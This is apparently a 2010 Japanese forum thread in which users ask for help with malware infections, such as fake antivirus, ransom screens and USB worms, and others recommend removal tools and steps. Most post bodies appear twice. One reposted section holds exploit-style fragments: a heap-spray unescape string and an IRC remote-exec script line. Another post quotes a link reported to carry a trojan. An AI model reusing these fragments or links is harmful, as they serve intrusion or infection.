>なぜだかモデムで有線LANでつないでるパソコンまでネットに接続できなくなり今に至る。
マルウェアの種類にもよるが
PC間でファイルの共有などをしているとLAN経由で感染も有り得る
553 :名無しさん@お腹いっぱい。:2010/11/12(金) 02:30:55
インターネットにはなんとかつながりオンラインスキャン試す。
pandaのみ導入できたもののiemaoを検出せず駆除できず。
他のソフトは導入中に止まるかブルースクリーンに。
Malwarebytes' Anti-Malwareも入れました。iemaoを検出して駆除まで。
期待しながら再起動したら残念ながら完全に元の状態で復活してました。
従来はウイルスが出たらレジストリいじるかセーフモードで駆除してたんだけどね。
iemaoはそれができないから痛い。つか何でセーフモードで起動できないんだか。
こういうページはあるけどね
PC起動不能「死のブルースクリーン」
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100219-OYT8T00677.htm
pandaのみ導入できたもののiemaoを検出せず駆除できず。
他のソフトは導入中に止まるかブルースクリーンに。
Malwarebytes' Anti-Malwareも入れました。iemaoを検出して駆除まで。
期待しながら再起動したら残念ながら完全に元の状態で復活してました。
従来はウイルスが出たらレジストリいじるかセーフモードで駆除してたんだけどね。
iemaoはそれができないから痛い。つか何でセーフモードで起動できないんだか。
こういうページはあるけどね
PC起動不能「死のブルースクリーン」
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100219-OYT8T00677.htm
554 :名無しさん@お腹いっぱい。:2010/11/12(金) 20:35:40
質問!
AVG使ってるんですけど、この板のAVGのスレ見に行ったら
ウィルスの警告出たんですがホントにウィルスなの?
AVG使ってるんですけど、この板のAVGのスレ見に行ったら
ウィルスの警告出たんですがホントにウィルスなの?
555 :名無しさん@お腹いっぱい。:2010/11/12(金) 21:11:46
んなわけねえ
誤認するようなスクリプトが貼られてるだけ
誤認するようなスクリプトが貼られてるだけ
556 :名無しさん@お腹いっぱい。:2010/11/15(月) 00:38:46
>>547です。
フリーウイルス対策ソフトをかけてみたものの駆除できず。
中にはインストールが途中で止まるものもある。おかしいと。
ファイル名をvirusにしたテキストをメモ帳で開くと3秒で閉じられた。
タイトルバーにvirusの文字があったら監視して閉じてるらしい。外国製ウイルスソフトはそれでインストールできないのも。
USBメモリを入れるとフォルダが増えた。実はフォルダのアイコンをしたexeだった。
ルートにappleというフォルダがあったらそれを隠しフォルダにしてapple.exeというアプリをフォルダのアイコンで置いていた。
強力すぎて怖いですね。全然歯が立たない。
リカバリーしかないのかな。なんか注意点ありますかね。
フリーウイルス対策ソフトをかけてみたものの駆除できず。
中にはインストールが途中で止まるものもある。おかしいと。
ファイル名をvirusにしたテキストをメモ帳で開くと3秒で閉じられた。
タイトルバーにvirusの文字があったら監視して閉じてるらしい。外国製ウイルスソフトはそれでインストールできないのも。
USBメモリを入れるとフォルダが増えた。実はフォルダのアイコンをしたexeだった。
ルートにappleというフォルダがあったらそれを隠しフォルダにしてapple.exeというアプリをフォルダのアイコンで置いていた。
強力すぎて怖いですね。全然歯が立たない。
リカバリーしかないのかな。なんか注意点ありますかね。
558 :名無しさん@お腹いっぱい。:2010/11/21(日) 14:40:40
Virus totalで参照選んでsend file押しても一瞬スキャンされるだけでブラウザが閉じちゃうんだけど
どうなっているの?
どうなっているの?
559 :名無しさん@お腹いっぱい。:2010/11/21(日) 17:52:47
560 :名無しさん@お腹いっぱい。:2010/11/21(日) 22:49:22
調べたのですが分からなくて・・・質問させてください
もしプライベートネットワーク内にあるパソコンがウイルスにかかっているとしたら、ネットワーク内全体の通信も読まれてしまうんでしょうか?
正確にいえば、TVでクレカの情報を入力したらそれが筒抜けになることはあるのでしょうか?
というかその認識が間違ってる?
もしプライベートネットワーク内にあるパソコンがウイルスにかかっているとしたら、ネットワーク内全体の通信も読まれてしまうんでしょうか?
正確にいえば、TVでクレカの情報を入力したらそれが筒抜けになることはあるのでしょうか?
というかその認識が間違ってる?
561 :名無しさん@お腹いっぱい。:2010/11/21(日) 23:14:59
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVG Antivirus Free」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「未導入」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「未導入」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「なにもなし」
昨日(11/20)くらいから、IEを立ち上げると「ちゃららんちゃんちゃんちゃん ウィンドウズ♪」みたいな音声が流れるようになりました。
最初2chのバナーにでも埋まってるのかと思いましたが、Googleのページとかでも鳴ります。
音声の出るサイトを開いてるからというわけではない模様。
PC内の音声データーも全部聞いてみたけど該当する音は無く、
サウンド設定も見たけど該当するサウンド設定は無く、AVGとSpypod Search and destroyでスキャンしても何も引っかかりません。
キャッシュやクッキーなども全部消して
二週間前のデーターでシステムの復元もしてみたけど何も変わらず。
一昨日までは鳴っていなかったので一体何なんだという状態です。
単なる設定なのかウィルスにでも感染したのか、なにか可能性があれば教えてください。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVG Antivirus Free」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「未導入」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「未導入」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「なにもなし」
昨日(11/20)くらいから、IEを立ち上げると「ちゃららんちゃんちゃんちゃん ウィンドウズ♪」みたいな音声が流れるようになりました。
最初2chのバナーにでも埋まってるのかと思いましたが、Googleのページとかでも鳴ります。
音声の出るサイトを開いてるからというわけではない模様。
PC内の音声データーも全部聞いてみたけど該当する音は無く、
サウンド設定も見たけど該当するサウンド設定は無く、AVGとSpypod Search and destroyでスキャンしても何も引っかかりません。
キャッシュやクッキーなども全部消して
二週間前のデーターでシステムの復元もしてみたけど何も変わらず。
一昨日までは鳴っていなかったので一体何なんだという状態です。
単なる設定なのかウィルスにでも感染したのか、なにか可能性があれば教えてください。
562 :名無しさん@お腹いっぱい。:2010/11/21(日) 23:15:43
>>560
パケットキャプチャ機能のあるウイルスなら
LAN内に流れるデータを採集することも可能
ただクレカ情報などはSSL暗号化によって守られることが
ほとんどなので被害は出ない・・・かもしれない
あと感染したPCのウイルスがLAN経由で
TVで使っているOSに感染するならキーボードの入力を盗まれて
筒抜けになる可能性もある
結局はウイルスの種類・動作によるのでなんとも言えんが
感染PCをネットワークから切り離して
駆除するか出来る限りリカバリを薦める
パケットキャプチャ機能のあるウイルスなら
LAN内に流れるデータを採集することも可能
ただクレカ情報などはSSL暗号化によって守られることが
ほとんどなので被害は出ない・・・かもしれない
あと感染したPCのウイルスがLAN経由で
TVで使っているOSに感染するならキーボードの入力を盗まれて
筒抜けになる可能性もある
結局はウイルスの種類・動作によるのでなんとも言えんが
感染PCをネットワークから切り離して
駆除するか出来る限りリカバリを薦める
563 :名無しさん@お腹いっぱい。:2010/11/21(日) 23:55:07
>>561
アドウェアっぽいな
軽く検索してみたがバックグラウンドで動く音声広告というやつかもな
PC詳しくないとさっぱり理解できないくらい面倒そうだ
Malwarebytes' Anti-Malwareなどでスキャンしても直らないようなら
リカバリした方が無難だな
ttp://www.techsupportforum.com/security-center/virus-trojan-spyware-help/resolved-hjt-threads/501532-ie-running-invisible-background-voice-ads.html
アドウェアっぽいな
軽く検索してみたがバックグラウンドで動く音声広告というやつかもな
PC詳しくないとさっぱり理解できないくらい面倒そうだ
Malwarebytes' Anti-Malwareなどでスキャンしても直らないようなら
リカバリした方が無難だな
ttp://www.techsupportforum.com/security-center/virus-trojan-spyware-help/resolved-hjt-threads/501532-ie-running-invisible-background-voice-ads.html
564 :名無しさん@お腹いっぱい。:2010/11/22(月) 01:07:43
原因わかりました
「ちゃららんちゃんちゃんちゃん リノボ♪」
ホームを職場にしてもGoogleにしても2ちゃんにしても必ず流れるのですが
もう一枚のタブはいつも同じサイトでした・・そう私はThinkPadユーザー
リノボコロス
「ちゃららんちゃんちゃんちゃん リノボ♪」
ホームを職場にしてもGoogleにしても2ちゃんにしても必ず流れるのですが
もう一枚のタブはいつも同じサイトでした・・そう私はThinkPadユーザー
リノボコロス
567 :名無しさん@お腹いっぱい。:2010/11/22(月) 01:48:55
あほ杉
568 :558:2010/11/22(月) 15:48:48
Avastで調べたら
Win32:Jomloon-D Win:32Trojan-gen JS:ADODOB-BM
が見つかりました。感染しているファイルCドライブのwindowsフォルダに
あるファイルにJS:ADODOB-BMのこりがwindows/system32フォルダにある
ファイルにWin32:Jomloon-DそしてCドライブのファイルとシステムの
復元のrestoreファイルにWin:32Trojan-genです。
Win32:Jomloon-D Win:32Trojan-gen JS:ADODOB-BM
が見つかりました。感染しているファイルCドライブのwindowsフォルダに
あるファイルにJS:ADODOB-BMのこりがwindows/system32フォルダにある
ファイルにWin32:Jomloon-DそしてCドライブのファイルとシステムの
復元のrestoreファイルにWin:32Trojan-genです。
569 :名無しさん@お腹いっぱい。:2010/11/22(月) 19:38:44
【使用OS】 「XP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVG 9.0.869」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Ad-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されません」
outlook expressに「Main identity」というユーザーが表示され、削除できません。
ノートン 360 バージョン 4.0の試用版も試しましたが、検出されませんでした。
対処方法を教えて頂けませんでしょうか。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVG 9.0.869」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Ad-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されません」
outlook expressに「Main identity」というユーザーが表示され、削除できません。
ノートン 360 バージョン 4.0の試用版も試しましたが、検出されませんでした。
対処方法を教えて頂けませんでしょうか。
570 :名無しさん@お腹いっぱい:2010/11/22(月) 21:49:48
a-squaredでスキャンしたところ
Trace.File.www.xhwjt.cn!A2
というウィルスを検出ググっても危険性についてよく理解出来ません
削除したほうがいいですか?
Trace.File.www.xhwjt.cn!A2
というウィルスを検出ググっても危険性についてよく理解出来ません
削除したほうがいいですか?
571 :名無しさん@お腹いっぱい。:2010/11/22(月) 22:07:17
>>562
THX
THX
572 :名無しさん@お腹いっぱい。:2010/11/27(土) 12:55:55
Dr.Webでスキャンしたところwfpdisable.exeなるものが検出されました
危険性についてはよくわからないんですが
どうやらスキンを変更するために使ったパッチが原因のようなんです
削除してもいいんですかね?
危険性についてはよくわからないんですが
どうやらスキンを変更するために使ったパッチが原因のようなんです
削除してもいいんですかね?
573 :名無しさん@お腹いっぱい。:2010/11/27(土) 15:43:38
574 :名無しさん@お腹いっぱい。:2010/12/05(日) 03:10:51
antivirus actionというモノに感染してしまいました
webページが全て見る事が出来ず困っています
どなたか解決作を教えて頂けませんか?
webページが全て見る事が出来ず困っています
どなたか解決作を教えて頂けませんか?
575 :名無しさん@お腹いっぱい。:2010/12/05(日) 19:00:51
やほお知恵袋でも最近立ったのあるけどどこ行って感染したの?
576 :名無しさん@お腹いっぱい。:2010/12/05(日) 20:14:32
ググったら除去方法の解説サイトやら動画があるな
↓こことか
ttp://www.bleepingcomputer.com/virus-removal/remove-antivirus-action
ttp://www.youtube.com/watch?v=mx3ZRWCcXpE
動画の方はhostsの修正をやってなかったりと不完全ぽいが参考にはなるだろう
全部英語だが簡単な方なのでがんばれ
ざっと見ると
1.Windowsを「セーフモードとネットワーク」で起動
2.マルウェアのプロセスをRKillで殺す
3.定義をアップデートしてMalwarebytes' Anti-Malwareでスキャン
4.hosts修正
5.再起動
6.残ったファイルとレジストリを削除
亜種もあるだろうから再起動の前にrunエントリを
チェックした方がいいかも知れんがこんなところだろうな
↓こことか
ttp://www.bleepingcomputer.com/virus-removal/remove-antivirus-action
ttp://www.youtube.com/watch?v=mx3ZRWCcXpE
動画の方はhostsの修正をやってなかったりと不完全ぽいが参考にはなるだろう
全部英語だが簡単な方なのでがんばれ
ざっと見ると
1.Windowsを「セーフモードとネットワーク」で起動
2.マルウェアのプロセスをRKillで殺す
3.定義をアップデートしてMalwarebytes' Anti-Malwareでスキャン
4.hosts修正
5.再起動
6.残ったファイルとレジストリを削除
亜種もあるだろうから再起動の前にrunエントリを
チェックした方がいいかも知れんがこんなところだろうな
577 :名無しさん@お腹いっぱい。:2010/12/06(月) 22:05:41
質問させて下さい。AVGでスキャンしたところiphoneのバックアップフォルダからウィルスが検出されたのですがありえるのでしょうか?OSはvistaです。エスパー質問になってたらすみません
578 :名無しさん@お腹いっぱい。:2010/12/07(火) 05:11:52
【使用OS】Vista 32bit Home Edition
【使用セキュリティソフトとバージョン】Norton Internet Security
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】書き込み時点でLive Updateが一分前に行われている
【スパイウェア対策ソフト】Norton Interenet Security?
【スパイウェア対策ソフトの更新は定期的に行なっているか】Yes
【ルータの有無】有
ウィルス等の検出ではないのですが、先ほど、自分のHotmailのアドレスからスパムが送信されたようです
ネトゲをやっているためKeyloggerの存在は知っていたので、とりあえずメッセンジャーの再インストールとパスワード変更を行いました
その時、Keyloggerの活動を調べるためにプロンプトからNetstat -bやったんですが……
その際、msnmsgr.exeのStateに、何でか知らんのですがantispyprogtoolがEstablishされてました
たしか、antispyprogtoolのドメインってAVSecurity Suiteの親だったようなそうでないような
(AV Security Suiteは以前感染して、レジストリ修正とかしたんで消せたと思っていたのですが)
なるべくOSの再インストールとかしないで取りうる対策があれば、ご教授ください。
【使用セキュリティソフトとバージョン】Norton Internet Security
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】書き込み時点でLive Updateが一分前に行われている
【スパイウェア対策ソフト】Norton Interenet Security?
【スパイウェア対策ソフトの更新は定期的に行なっているか】Yes
【ルータの有無】有
ウィルス等の検出ではないのですが、先ほど、自分のHotmailのアドレスからスパムが送信されたようです
ネトゲをやっているためKeyloggerの存在は知っていたので、とりあえずメッセンジャーの再インストールとパスワード変更を行いました
その時、Keyloggerの活動を調べるためにプロンプトからNetstat -bやったんですが……
その際、msnmsgr.exeのStateに、何でか知らんのですがantispyprogtoolがEstablishされてました
たしか、antispyprogtoolのドメインってAVSecurity Suiteの親だったようなそうでないような
(AV Security Suiteは以前感染して、レジストリ修正とかしたんで消せたと思っていたのですが)
なるべくOSの再インストールとかしないで取りうる対策があれば、ご教授ください。
579 :名無しさん@お腹いっぱい。:2010/12/07(火) 23:53:48
俺もantivirus action に感染した。
別のHDDで起動して、感染したHDDを見たがlocal setting内に言われるファイルはなかった。
仕方ないと思って再セットアップの準備しました。
復元てしたことがなかったから一度やってみようと感染したHDDにてsafeモードで起動。
感染前に復元したら問題なくなった。
どうしよう。大丈夫なのか?
別のHDDで起動して、感染したHDDを見たがlocal setting内に言われるファイルはなかった。
仕方ないと思って再セットアップの準備しました。
復元てしたことがなかったから一度やってみようと感染したHDDにてsafeモードで起動。
感染前に復元したら問題なくなった。
どうしよう。大丈夫なのか?
580 :名無しさん@お腹いっぱい。:2010/12/08(水) 18:51:39
変なサイトを踏んだらしく
PCを立ち上げるとアダルトサイトの入会なんたらが毎回勝手に画面に表れます。
このプログラムを削除しようとしても管理者云々で削除が不可能です。
この変なプログラムに感染してから、インターネットでサイトを回っても閲覧履歴に載らずに、
展開も削除も不可能な変な記号みたいなのが表示されます。
元に戻すにはどうしたら良いでしょうか?
PCを立ち上げるとアダルトサイトの入会なんたらが毎回勝手に画面に表れます。
このプログラムを削除しようとしても管理者云々で削除が不可能です。
この変なプログラムに感染してから、インターネットでサイトを回っても閲覧履歴に載らずに、
展開も削除も不可能な変な記号みたいなのが表示されます。
元に戻すにはどうしたら良いでしょうか?
581 :名無しさん@お腹いっぱい。:2010/12/08(水) 21:48:57
>>580
リカバリしかないな
リカバリしかないな
582 :名無しさん@お腹いっぱい。:2010/12/14(火) 02:42:10
HDDに保存して数日前まで見れていたjpeg画像の10個ほどが
バツ印になり表示されなくなりました。
サイズは元のままで、変だなと思いつつ外付けのバックアップから上書きしましたが
一日たったくらいでまた上書きしたもの含めた5つほどが使用不可になっていました。
最近やったことといえば2Kのインストールをし、
別の日付の組み合わせでレジストリやシステム復元をしたばかりです。
これはウイルスでしょうか?
ちなみにキングソフトのスキャンは試しましたが何も発見されませんでした。
バツ印になり表示されなくなりました。
サイズは元のままで、変だなと思いつつ外付けのバックアップから上書きしましたが
一日たったくらいでまた上書きしたもの含めた5つほどが使用不可になっていました。
最近やったことといえば2Kのインストールをし、
別の日付の組み合わせでレジストリやシステム復元をしたばかりです。
これはウイルスでしょうか?
ちなみにキングソフトのスキャンは試しましたが何も発見されませんでした。
583 :名無しさん@お腹いっぱい。:2010/12/14(火) 14:11:15
なんか、画面にお金振り込むまであと70時間って画面が出て再起動しても「何してもきえないへんな画面がでてるんですけどこれを消す方法わかる人教えてください?
本気でこまってます。
本気でこまってます。
584 :名無しさん@お腹いっぱい。:2010/12/14(火) 17:30:59
585 :名無しさん@お腹いっぱい。:2010/12/18(土) 19:20:42
586 :名無しさん@お腹いっぱい。:2010/12/18(土) 20:22:08
現在404で無害だけど相当昔にトロイ検出されてたことあり、速やかにNG登録推奨
229 名前:/名無しさん[1-30].jpg mailto:sage [2007/12/10(月) 00:59:49 ID:qIrrQl+X0]
www.guild-air.net/seal/up/img/009.-jpg
おねがいします
230 名前:9999 ◆9999/.bcV. mailto:sage [2007/12/10(月) 01:02:20 ID:w504aA0V0]
>>229
トロイの木馬 Trojan-Downloader.JS.Agent.aj
をカスペルスキーが感知しました
PC有害 とみなします
229 名前:/名無しさん[1-30].jpg mailto:sage [2007/12/10(月) 00:59:49 ID:qIrrQl+X0]
www.guild-air.net/seal/up/img/009.-jpg
おねがいします
230 名前:9999 ◆9999/.bcV. mailto:sage [2007/12/10(月) 01:02:20 ID:w504aA0V0]
>>229
トロイの木馬 Trojan-Downloader.JS.Agent.aj
をカスペルスキーが感知しました
PC有害 とみなします
587 :名無しさん@お腹いっぱい。:2010/12/18(土) 22:55:57
588 :名無しさん@お腹いっぱい。:2010/12/25(土) 18:48:59
使用OS】 「WindowsXP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスチェイサー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「有」
あるファイルを個別スキャンすると「Tool.SMSSend.131」でハックキングツールと出ます。
ちがうPCに入ってあるウィルスバスタービジネス版で同じファイルを個別スキャンすると検出されません。
このファイルは問題ない(開いても)もいいのでしょうか?
よろしくお願い致します。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスチェイサー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「有」
あるファイルを個別スキャンすると「Tool.SMSSend.131」でハックキングツールと出ます。
ちがうPCに入ってあるウィルスバスタービジネス版で同じファイルを個別スキャンすると検出されません。
このファイルは問題ない(開いても)もいいのでしょうか?
よろしくお願い致します。
589 :名無しさん@お腹いっぱい。:2010/12/25(土) 19:13:51
出所のよくわからないファイルをダブルクリックするのはあんまよろしくないかと
用途がグレーな内容のexeファイルならこういうところで聞くのはお門違いだし
どうしても自分に必要な物なら、ウイルストータルとかにファイルうpして自己判断自己責任でどうじょ
用途がグレーな内容のexeファイルならこういうところで聞くのはお門違いだし
どうしても自分に必要な物なら、ウイルストータルとかにファイルうpして自己判断自己責任でどうじょ
590 :名無しさん@お腹いっぱい。:2010/12/26(日) 18:26:45
4 :z:2010/08/28(土) 10:25:02 ID:NtVfNVmU0
452 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。
ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/
漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
454 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか?
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか?
452 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。
ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/
漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
454 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか?
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか?
591 :名無しさん@お腹いっぱい。:2010/12/26(日) 19:56:59
先ほど以下のサイト踏んじゃってウィルスみたいなんですけど、
やばいですかね?どういう実害あるんでしょうか?
お詳しいかたお願いいたします。
blog20fc2.com/mabledays/
やばいですかね?どういう実害あるんでしょうか?
お詳しいかたお願いいたします。
blog20fc2.com/mabledays/
592 :名無しさん@お腹いっぱい。:2010/12/26(日) 20:22:48
そのページもう無いからわからないけど
ネトゲのスレに貼られてるようだしアカウントハックじゃないの
ネトゲのスレに貼られてるようだしアカウントハックじゃないの
593 :名無しさん@お腹いっぱい。:2010/12/26(日) 20:32:47
AVGがページ表示をブロックしたけど進んでみると現在404、いつから404なのかわからないから気になるのならオンラインスキャンとかおすすめ
ネトゲのスレに貼られてたみたいだしそっち系だろうね
アカハック踏ませる方法は本当に手が込んでるわ
ネトゲのスレに貼られてたみたいだしそっち系だろうね
アカハック踏ませる方法は本当に手が込んでるわ
594 :名無しさん@お腹いっぱい。:2010/12/26(日) 20:35:15
そうですか。ありがとうございます。
やってみます。マイクロソフト無料のセキュリティエッセンシャルってやつでも
問題ないですかね。
やってみます。マイクロソフト無料のセキュリティエッセンシャルってやつでも
問題ないですかね。
595 :名無しさん@お腹いっぱい。:2010/12/26(日) 20:45:35
596 :名無しさん@お腹いっぱい。:2010/12/26(日) 20:51:09
ttp://item.rakuten.co.jp/k-taishop/cay01tka/
ttp://www.gmatome.jp/
上記も見てもらっていいですか。連続で2ちゃんに張られたもので。。。
同じ人が張ってまして。ウイルスといってました。
マイクロソフト無料のセキュリティエッセンシャルは入ってました。
ttp://www.gmatome.jp/
上記も見てもらっていいですか。連続で2ちゃんに張られたもので。。。
同じ人が張ってまして。ウイルスといってました。
マイクロソフト無料のセキュリティエッセンシャルは入ってました。
597 :名無しさん@お腹いっぱい。:2010/12/26(日) 21:12:06
>>596
上 楽天市場の携帯のページ、そこまでpc無害
下 ゲーム情報まとめサイトジーマ、ゲームのニュース4亀などへのリンク集、そこまでpc無害リンク先はしらね
> マイクロソフト無料のセキュリティエッセンシャルは入ってました。
入っているなら精神衛生上良くない場合にだけオンラインスキャンかな
上 楽天市場の携帯のページ、そこまでpc無害
下 ゲーム情報まとめサイトジーマ、ゲームのニュース4亀などへのリンク集、そこまでpc無害リンク先はしらね
> マイクロソフト無料のセキュリティエッセンシャルは入ってました。
入っているなら精神衛生上良くない場合にだけオンラインスキャンかな
598 :名無しさん@お腹いっぱい。:2010/12/26(日) 21:20:08
わざわざありがとうございます。
今フルスキャン中です。
今フルスキャン中です。
599 :名無しさん@お腹いっぱい。:2010/12/26(日) 21:49:06
600 :名無しさん@お腹いっぱい。:2010/12/26(日) 22:46:56
上のはぐぐると携帯スレが出るけど内容を見ると一人が「マカフィでウイルスが・・、ブラクラが・・だから見るな」と騒いでるだけなのよね
リンク先の携帯機種のアンチが一人で騒いでる感じだね
リンク先の携帯機種のアンチが一人で騒いでる感じだね
601 :名無しさん@お腹いっぱい。:2010/12/26(日) 22:59:27
602 :名無しさん@お腹いっぱい。:2010/12/28(火) 06:29:02
アダルトサイトを回ってたらHDDlowというウィルスに感染してしまったのですが
危険性と対処法を教えてください
とりあえずspybotでスキャンしているところなのですが
他に良い方法がありましたらお願いします
危険性と対処法を教えてください
とりあえずspybotでスキャンしているところなのですが
他に良い方法がありましたらお願いします
603 :名無しさん@お腹いっぱい。:2010/12/28(火) 07:20:56
OKWaveの記事は何ですか
604 :名無しさん@お腹いっぱい。:2010/12/28(火) 19:00:41
知恵袋で一部の回答者たちが毎回バスターをすげぇダメソフトと言いまわってるけど
これ事実なの? しかも同一人物が複数のID使い分けてまで非難してるけどさ
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail.php?qid=1352769203#132902110
これ事実なの? しかも同一人物が複数のID使い分けてまで非難してるけどさ
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail.php?qid=1352769203#132902110
605 :名無しさん@お腹いっぱい。:2010/12/28(火) 19:35:47
ベンダーごとに信者がいるからしょうがない、糞ソフト呼ばわりは知恵袋だけじゃなくてこの板でもよくあること
バスターでもそういうことがあったのかは知らないけど、誤検出でwindowsの重要ファイルを消してしまってOSが起動しなくなるというのは実際にある
バスターでもそういうことがあったのかは知らないけど、誤検出でwindowsの重要ファイルを消してしまってOSが起動しなくなるというのは実際にある
606 :八頭 ◆YAGApwSaEw :2010/12/31(金) 15:03:05
併用したいセカンドスキャナ更新
【Emsisoft - MalAware】 (*クイックチェック用クラウドスキャナ *Emergency Kitとの併用がベストです)
*インストール不要タイプ *頻繁にプログラムアップデートしているので都度ダウンロードして試してみて下さい
http://www.emsisoft.com/en/software/malaware/ (使い方:http://i47.tinypic.com/hv9r1d.jpg )
【Emsisoft - Free Emergency Kit】 ウイルス・トロイの木馬のスキャンと駆除 (*常駐保護は無し *手動Update )
http://www.emsisoft.com/en/software/eek/ *インストール不要タイプ (使い方:http://i26.tinypic.com/deo8xe.jpg )
【Live OneCare PC セーフティ オンラインスキャン】 (*駆除も可能 *Flash必要 *月1・2回程度空き時間に試してみて下さい)
http://onecare.live.com/site/ja-jp/default.htm (*使い方:http://i53.tinypic.com/dgqw76.jpg )
【F-Secure - Easy Clean】 (*クイックチェック用クラウドスキャナ *インストール不要タイプ )
http://www.softpedia.com/get/Antivirus/F-Secure-Easy-Clean.shtml (使い方:http://i52.tinypic.com/eknq4y.jpg )
【F-Secure オンラインスキャナ】 (*駆除も可能 *一時的にでも、Java の最新バージョン必要)
http://www.f-secure.com/ja_JP/security/security-lab/tools-and-services/online-scanner/
【McAfee - Stinger】 (*インストール不要 *全ファイルスキャン *駆除可能 *月に数回配布 )
http://www.softpedia.com/get/Antivirus/McAfee-AVERT-Stinger.shtml (使い方:http://i54.tinypic.com/2q1uj2f.jpg )
【Malwarebytes' Anti-Malware】 ウイルス・スパイウェアのスキャンと駆除 (*常駐保護は無し *手動Update)
http://www.malwarebytes.org/mbam.php (使い方:http://i56.tinypic.com/2ba076.jpg )
【Spyware Blaster】 http://www.javacoolsoftware.com/index.html (http://i45.tinypic.com/2ce6gkw.jpg *Flash Killer機能も実用的です)
【Emsisoft - MalAware】 (*クイックチェック用クラウドスキャナ *Emergency Kitとの併用がベストです)
*インストール不要タイプ *頻繁にプログラムアップデートしているので都度ダウンロードして試してみて下さい
http://www.emsisoft.com/en/software/malaware/ (使い方:http://i47.tinypic.com/hv9r1d.jpg )
